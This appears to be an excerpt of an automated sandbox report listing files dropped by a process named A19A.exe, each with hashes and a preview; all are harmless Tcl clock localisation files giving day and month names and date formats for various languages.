                                                                                                                                                                                                                                                                                                                                SHA1:83A284899785956ECB015BBB871E7E04A7C36585
                                                                                                                                                                                                                                                                                                                                SHA-256:C71A07169CDBE9962616D28F38C32D641DA277E53E67F8E3A69EB320C1E2B88C
                                                                                                                                                                                                                                                                                                                                SHA-512:28570CB14452CA5285D97550EA77C9D8F71C57DE6C1D144ADB00B93712F588AF900DA32C10C3A81C7A2DEE11A3DC843780D24218F53920AB72E90321677CC9E8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \. "Dom"\. "Lun"\. "Mar"\. "M\u00e9r"\. "Xov"\. "Ven"\. "S\u00e1b"]. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \. "Domingo"\. "Luns"\. "Martes"\. "M\u00e9rcores"\. "Xoves"\. "Venres"\. "S\u00e1bado"]. ::msgcat::mcset gl MONTHS_ABBREV [list \. "Xan"\. "Feb"\. "Mar"\. "Abr"\. "Mai"\. "Xu\u00f1"\. "Xul"\. "Ago"\. "Set"\. "Out"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset gl MONTHS_FULL [list \. "Xaneiro"\. "Febreiro"\. "Marzo"\. "Abril"\. "Maio"\. "Xu\u00f1o"\. "Xullo"\. "Agosto"\. "Setembro"\. "Outubro"\. "Novembro"\. "Decembro"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.839318757139709
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoPhkgvNLoPxsF3v6aZoPhk9+3vR6HK:4EnLzu8NrvNEK3v6a2J3voq
                                                                                                                                                                                                                                                                                                                                MD5:3FCDF0FC39C8E34F6270A646A996F663
                                                                                                                                                                                                                                                                                                                                SHA1:6999E82148E1D1799C389BCC6C6952D5514F4A4B
                                                                                                                                                                                                                                                                                                                                SHA-256:BC2B0424CF27BEF67F309E2B6DFFEF4D39C46F15D91C15E83E070C7FD4E20C9C
                                                                                                                                                                                                                                                                                                                                SHA-512:CDB9ED694A7E555EB321F559E9B0CC0998FD526ADEF33AD08C56943033351D70900CD6EC62D380E23AB9F65CCFB85F4EEEB4E17FA8CC05E56C2AC57FBEDE721E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y". ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1037
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.13549698574103
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu81WjLHkFQSMnKIeCPHy3CAVfbku5SJ:460jwyLTySI4J
                                                                                                                                                                                                                                                                                                                                MD5:3350E1228CF7157ECE68762F967F2F32
                                                                                                                                                                                                                                                                                                                                SHA1:2D0411DA2F6E0441B1A8683687178E9EB552B835
                                                                                                                                                                                                                                                                                                                                SHA-256:75AA686FF901C9E66E51D36E8E78E5154B57EE9045784568F6A8798EA9689207
                                                                                                                                                                                                                                                                                                                                SHA-512:1D0B44F00A5E6D7B8CECB67EAF060C6053045610CF7246208C8E63E7271C7780587A184D38ECFDFDCFB976F9433FEFDA0BAF8981FCD197554D0874ED1E6B6428
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \. "Jed"\. "Jel"\. "Jem"\. "Jerc"\. "Jerd"\. "Jeh"\. "Jes"]. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \. "Jedoonee"\. "Jelhein"\. "Jemayrt"\. "Jercean"\. "Jerdein"\. "Jeheiney"\. "Jesarn"]. ::msgcat::mcset gv MONTHS_ABBREV [list \. "J-guer"\. "T-arree"\. "Mayrnt"\. "Avrril"\. "Boaldyn"\. "M-souree"\. "J-souree"\. "Luanistyn"\. "M-fouyir"\. "J-fouyir"\. "M.Houney"\. "M.Nollick"\. ""]. ::msgcat::mcset gv MONTHS_FULL [list \. "Jerrey-geuree"\. "Toshiaght-arree"\. "Mayrnt"\. "Averil"\. "Boaldyn"\. "Mean-souree"\. "Jerrey-souree"\. "Luanistyn"\. "Mean-fouyir"\. "Jerrey-fouyir"\. "Mee Houney"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.890913756172577
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoQbtvvNLoQLE3v6aZoQbto+3vR6HK:4EnLzu8CbtvvNBLE3v6avbtF3voq
                                                                                                                                                                                                                                                                                                                                MD5:A65040748621B18B1F88072883891280
                                                                                                                                                                                                                                                                                                                                SHA1:4D0ED6668A99BAC9B273B0FA8BC74EB6BB9DDFC8
                                                                                                                                                                                                                                                                                                                                SHA-256:823AF00F4E44613E929D32770EDB214132B6E210E872751624824DA5F0B78448
                                                                                                                                                                                                                                                                                                                                SHA-512:16FFD4107C3B85619629B2CD8A48AB9BC3763FA6E4FE4AE910EDF3B42209CEEB8358D4E7E531C2417875D05E5F801BB19B10130FA8BF70E44CFD8F1BA06F6B6E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y". ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1938
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.234997703698801
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8Hdd4CLxLtmCLoCLHCL3CLXLICLP1ptzLzCJCLt5LL53h5Lq+p5LcL3pLzCt:4655ftB9hMcGlhO8/n/0ecOfC3
                                                                                                                                                                                                                                                                                                                                MD5:FFD5D8007D78770EA0E7E5643F1BD20A
                                                                                                                                                                                                                                                                                                                                SHA1:40854EB81EE670086D0D0C0C2F0F9D8406DF6B47
                                                                                                                                                                                                                                                                                                                                SHA-256:D27ADAF74EBB18D6964882CF931260331B93AE4B283427F9A0DB147A83DE1D55
                                                                                                                                                                                                                                                                                                                                SHA-512:EFBDADE1157C7E1CB8458CBA89913FB44DC2399AD860FCAEDA588B99230B0934EDAAF8BAB1742E03F06FA8047D3605E8D63BB23EC4B32155C256D07C46ABBFEE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \. "\u05d0"\. "\u05d1"\. "\u05d2"\. "\u05d3"\. "\u05d4"\. "\u05d5"\. "\u05e9"]. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\. "\u05e9\u05d1\u05ea"]. ::msgcat::mcset he MONTHS_ABBREV [list \. "\u05d9\u05e0\u05d5"\. "\u05e4\u05d1\u05e8"\. "\u05de\u05e8\u05e5"\. "\u05d0\u05e4\u05e8"\. "\u05de\u05d0\u05d9"\. "\u05d9\u05d5\u05e0"\. "\u05d9\u05d5\u05dc"\. "\u05d0\u05d5\u05d2"\. "\u05e1\u05e4\u05d8"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1738
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1505681803025185
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8dVYe48VcOVcz1HtDVcqiVca4mGE18VcRBkEVcRfVcRMsVcqiVca4mGE18VI:465v4bNVO7GQbBkDuM4O7GQbBkDuh3x
                                                                                                                                                                                                                                                                                                                                MD5:349823390798DF68270E4DB46C3CA863
                                                                                                                                                                                                                                                                                                                                SHA1:814F9506FCD8B592C22A47023E73457C469B2F53
                                                                                                                                                                                                                                                                                                                                SHA-256:FAFE65DB09BDCB863742FDA8705BCD1C31B59E0DD8A3B347EA6DEC2596CEE0E9
                                                                                                                                                                                                                                                                                                                                SHA-512:4D12213EA9A3EAD6828E21D3B5B73931DC922EBE8FD2373E3A3E106DF1784E0BCE2C9D1FBEAE0D433449BE6D28A0F2F50F49AB8C208E69D413C6787ADF52915E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \. "\u0930\u0935\u093f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\. "\u092c\u0941\u0927\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset hi MONTHS_ABBREV [list \. "\u091c\u0928\u0935\u0930\u0940"\. "\u092b\u093c\u0930\u0935\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u0905\u092a\u094d\u0930\u0947\u0932"\. "\u092e\u0908"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u093e\u0908"\. "\u0905\u0917\u0938\u094d\u0924"\. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\. "\u0928\u0935\u092e\u094d\u092c\u093
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882853646266983
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmocv+9/Loz3v6rZoco+3v+6f6HK:4EnLzu8+vWq3v6rpF3vmq
                                                                                                                                                                                                                                                                                                                                MD5:BC86C58492BCB8828489B871D2A727F0
                                                                                                                                                                                                                                                                                                                                SHA1:22EEC74FC011063071A40C3860AE8EF38D898582
                                                                                                                                                                                                                                                                                                                                SHA-256:29C7CA358FFFCAF94753C7CC2F63B58386234B75552FA3272C2E36F253770C3F
                                                                                                                                                                                                                                                                                                                                SHA-512:ABFE093952144A285F7A86800F5933F7242CB224D917B4BAA4FD2CA48792BEFCBEE9AB7073472510B53D31083719EC68A77DD896410B3DC3C6E2CCD60C2E92F9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1121
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.291836444825864
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu84VBVgqoLpYDThoLZDT25KNWg1gqNvEKvOAl:46nNYPSLZP2ZVqJTO+
                                                                                                                                                                                                                                                                                                                                MD5:46FD3DF765F366C60B91FA0C4DE147DE
                                                                                                                                                                                                                                                                                                                                SHA1:5E006D1ACA7BBDAC9B8A65EFB26FAFC03C6E9FDE
                                                                                                                                                                                                                                                                                                                                SHA-256:9E14D8F7F54BE953983F198C8D59F38842C5F73419A5E81BE6460B3623E7307A
                                                                                                                                                                                                                                                                                                                                SHA-512:3AC26C55FB514D9EA46EF57582A2E0B64822E90C889F4B83A62EE255744FEBE0A012079DD764E0F6C7338B3580421C5B6C8575E0B85632015E3689CF58D9EB77
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \. "ned"\. "pon"\. "uto"\. "sri"\. "\u010det"\. "pet"\. "sub"]. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \. "nedjelja"\. "ponedjeljak"\. "utorak"\. "srijeda"\. "\u010detvrtak"\. "petak"\. "subota"]. ::msgcat::mcset hr MONTHS_ABBREV [list \. "sij"\. "vel"\. "o\u017eu"\. "tra"\. "svi"\. "lip"\. "srp"\. "kol"\. "ruj"\. "lis"\. "stu"\. "pro"\. ""]. ::msgcat::mcset hr MONTHS_FULL [list \. "sije\u010danj"\. "velja\u010da"\. "o\u017eujak"\. "travanj"\. "svibanj"\. "lipanj"\. "srpanj"\. "kolovoz"\. "rujan"\. "listopad"\. "studeni"\. "prosinac"\. ""]. ::msgcat::mcset hr DATE_FORMAT "
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1327
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.447184847972284
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8Xjv5ZemNruwcVNtZHTE9wocxPvt9vq:46fBZemNqwIZHTEE3t5q
                                                                                                                                                                                                                                                                                                                                MD5:0561E62941F6ED8965DFC4E2B424E028
                                                                                                                                                                                                                                                                                                                                SHA1:C622B21C0DBA83F943FBD10C746E5FABE20235B2
                                                                                                                                                                                                                                                                                                                                SHA-256:314F4180C05DE4A4860F65AF6460900FFF77F12C08EDD728F68CA0065126B9AE
                                                                                                                                                                                                                                                                                                                                SHA-512:CAD01C963145463612BBAE4B9F5C80B83B228C0181C2500CE8CE1394E1A32CCA3587221F1406F6343029059F5AD47E8FD5514535DCEA45BBA6B2AE76993DFFBD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \. "V"\. "H"\. "K"\. "Sze"\. "Cs"\. "P"\. "Szo"]. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \. "vas\u00e1rnap"\. "h\u00e9tf\u0151"\. "kedd"\. "szerda"\. "cs\u00fct\u00f6rt\u00f6k"\. "p\u00e9ntek"\. "szombat"]. ::msgcat::mcset hu MONTHS_ABBREV [list \. "jan."\. "febr."\. "m\u00e1rc."\. "\u00e1pr."\. "m\u00e1j."\. "j\u00fan."\. "j\u00fal."\. "aug."\. "szept."\. "okt."\. "nov."\. "dec."\. ""]. ::msgcat::mcset hu MONTHS_FULL [list \. "janu\u00e1r"\. "febru\u00e1r"\. "m\u00e1rcius"\. "\u00e1prilis"\. "m\u00e1jus"\. "j\u00fanius"\. "j\u00falius"\. "augusztus"\. "szeptember"\. "okt\u00f3ber"\. "nove
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9322448438499125
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8acGEXctI9tdb/7579g6tdhUgQbVg:46GBEXKI9tdHtdwg
                                                                                                                                                                                                                                                                                                                                MD5:CE834C7E0C3170B733122FF8BF38C28D
                                                                                                                                                                                                                                                                                                                                SHA1:693ACC2A0972156B984106AFD07911AF14C4F19C
                                                                                                                                                                                                                                                                                                                                SHA-256:1F1B0F5DEDE0263BD81773A78E98AF551F36361ACCB315B618C8AE70A5FE781E
                                                                                                                                                                                                                                                                                                                                SHA-512:23BFC6E2CDB7BA75AAC3AA75869DF4A235E4526E8E83D73551B3BC2CE89F3675EBFA75BC94177F2C2BD6AC58C1B125BE65F8489BC4F85FA701415DB9768F7A80
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \. "Min"\. "Sen"\. "Sel"\. "Rab"\. "Kam"\. "Jum"\. "Sab"]. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \. "Minggu"\. "Senin"\. "Selasa"\. "Rabu"\. "Kamis"\. "Jumat"\. "Sabtu"]. ::msgcat::mcset id MONTHS_ABBREV [list \. "Jan"\. "Peb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Agu"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset id MONTHS_FULL [list \. "Januari"\. "Pebruari"\. "Maret"\. "April"\. "Mei"\. "Juni"\. "Juli"\. "Agustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.857986813915644
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmo0kGvNLo0F/W3v6aZo0kT+3vR6HK:4EnLzu8NGvNS3v6aQK3voq
                                                                                                                                                                                                                                                                                                                                MD5:A285817AAABD5203706D5F2A34158C03
                                                                                                                                                                                                                                                                                                                                SHA1:18FD0178051581C9F019604499BF91B16712CC91
                                                                                                                                                                                                                                                                                                                                SHA-256:DB81643BA1FD115E9D547943A889A56DFC0C81B63F21B1EDC1955C6884C1B2F5
                                                                                                                                                                                                                                                                                                                                SHA-512:0B6C684F2E5122681309A6212980C95C14172723F12D4864AF8A8A913DC7081BC42AC39CF087D29770B4A1F0B3B1F712856CBF05D1975FFFC008C16A91081A00
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y". ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1255
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.391152464169964
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8qVXVDWpXMVmDz1ZVcWVzbQ1/xZ9b3eYXvhv3eT3:462hVW5JDz1ZVUbpfV83
                                                                                                                                                                                                                                                                                                                                MD5:6695839F1C4D2A92552CB1647FD14DA5
                                                                                                                                                                                                                                                                                                                                SHA1:04CB1976846A78EA9593CB3706C9D61173CE030C
                                                                                                                                                                                                                                                                                                                                SHA-256:6767115FFF2DA05F49A28BAD78853FAC6FC716186B985474D6D30764E1727C40
                                                                                                                                                                                                                                                                                                                                SHA-512:208766038A6A1D748F4CB2660F059AD355A5439EA6D8326F4F410B2DFBBDEECB55D4CE230C01C519B08CAB1CF5E5B3AC61E7BA86020A7BDA1AFEA624F3828521
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \. "sun."\. "m\u00e1n."\. "\u00feri."\. "mi\u00f0."\. "fim."\. "f\u00f6s."\. "lau."]. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \. "sunnudagur"\. "m\u00e1nudagur"\. "\u00feri\u00f0judagur"\. "mi\u00f0vikudagur"\. "fimmtudagur"\. "f\u00f6studagur"\. "laugardagur"]. ::msgcat::mcset is MONTHS_ABBREV [list \. "jan."\. "feb."\. "mar."\. "apr."\. "ma\u00ed"\. "j\u00fan."\. "j\u00fal."\. "\u00e1g\u00fa."\. "sep."\. "okt."\. "n\u00f3v."\. "des."\. ""]. ::msgcat::mcset is MONTHS_FULL [list \. "jan\u00faar"\. "febr\u00faar"\. "mars"\. "apr\u00edl"\. "ma\u00ed"\. "j\u00fan\u00ed"\. "j\u00fal\u00ed"\. "\u00e1g\u00fast"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1240
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.207511774275323
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8iYJcc8jYShjLhQ6I3S68gvNvlNUhsFNlVGvNmv5svc:46Wi38jBJLhQ6I3EgFtNo4NlVGlw5Kc
                                                                                                                                                                                                                                                                                                                                MD5:8E205D032206D794A681E2A994532FA6
                                                                                                                                                                                                                                                                                                                                SHA1:47098672D339624474E8854EB0512D54A0CA49E7
                                                                                                                                                                                                                                                                                                                                SHA-256:C7D84001855586A0BAB236A6A5878922D9C4A2EA1799BF18544869359750C0DF
                                                                                                                                                                                                                                                                                                                                SHA-512:139219DBD014CCA15922C45C7A0468F62E864F18CC16C7B8506258D1ECD766E1EFF6EAE4DFDAF72898B9AF1A5E6CE8D7BB0F1A93A6604D2539F2645C9ED8D146
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \. "dom"\. "lun"\. "mar"\. "mer"\. "gio"\. "ven"\. "sab"]. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \. "domenica"\. "luned\u00ec"\. "marted\u00ec"\. "mercoled\u00ec"\. "gioved\u00ec"\. "venerd\u00ec"\. "sabato"]. ::msgcat::mcset it MONTHS_ABBREV [list \. "gen"\. "feb"\. "mar"\. "apr"\. "mag"\. "giu"\. "lug"\. "ago"\. "set"\. "ott"\. "nov"\. "dic"\. ""]. ::msgcat::mcset it MONTHS_FULL [list \. "gennaio"\. "febbraio"\. "marzo"\. "aprile"\. "maggio"\. "giugno"\. "luglio"\. "agosto"\. "settembre"\. "ottobre"\. "novembre"\. "dicembre"\. ""]. ::msgcat::mcset it BCE "aC". ::msgc
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.851375233848049
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoi5jLWNLoyJ+3vULoia+3vjLtA6:4EnLzu8m3WNJ+3v23v3t3
                                                                                                                                                                                                                                                                                                                                MD5:8666E24230AED4DC76DB93BE1EA07FF6
                                                                                                                                                                                                                                                                                                                                SHA1:7C688C8693C76AEE07FB32637CD58E47A85760F3
                                                                                                                                                                                                                                                                                                                                SHA-256:2EE356FFA2491A5A60BDF7D7FEBFAC426824904738615A0C1D07AEF6BDA3B76F
                                                                                                                                                                                                                                                                                                                                SHA-512:BCCE87FB94B28B369B9EE48D792A399DB8250D0D3D73FC05D053276A7475229EF1555D5E516D780092496F0E5F229A9912A45FB5A88C024FCEBF08E654D37B07
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y". ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S". ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1664
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.88149888596689
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8VcQHxbtVLKMwvtFwvQv4fTweLvDvTwS0Zu+jqgv:46RbItt4mCEebzES0njqq
                                                                                                                                                                                                                                                                                                                                MD5:430DEB41034402906156D7E23971CD2C
                                                                                                                                                                                                                                                                                                                                SHA1:0952FFBD241B5111714275F5CD8FB5545067FFEC
                                                                                                                                                                                                                                                                                                                                SHA-256:38DCA9B656241884923C451A369B90A9F1D76F9029B2E98E04784323169C3251
                                                                                                                                                                                                                                                                                                                                SHA-512:AE5DF1B79AE34DF4CC1EB00406FFF49541A95E2C732E3041CCE321F2F3FA6461BB45C6524A5FEB77E18577206CBD88A83FBF20B4B058BAE9B889179C93221557
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u6708"\. "\u706b"\. "\u6c34"\. "\u6728"\. "\u91d1"\. "\u571f"]. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \. "\u65e5\u66dc\u65e5"\. "\u6708\u66dc\u65e5"\. "\u706b\u66dc\u65e5"\. "\u6c34\u66dc\u65e5"\. "\u6728\u66dc\u65e5"\. "\u91d1\u66dc\u65e5"\. "\u571f\u66dc\u65e5"]. ::msgcat::mcset ja MONTHS_FULL [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"]. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d". ::msgcat::mcset ja CE "\u897f\u66a6". ::msgcat::mcset ja AM "\u5348\u524d". ::msgcat::mcset ja PM "\u5348\u5f8c". ::msgcat::mcset ja DATE_FORMAT "%Y/%m/%
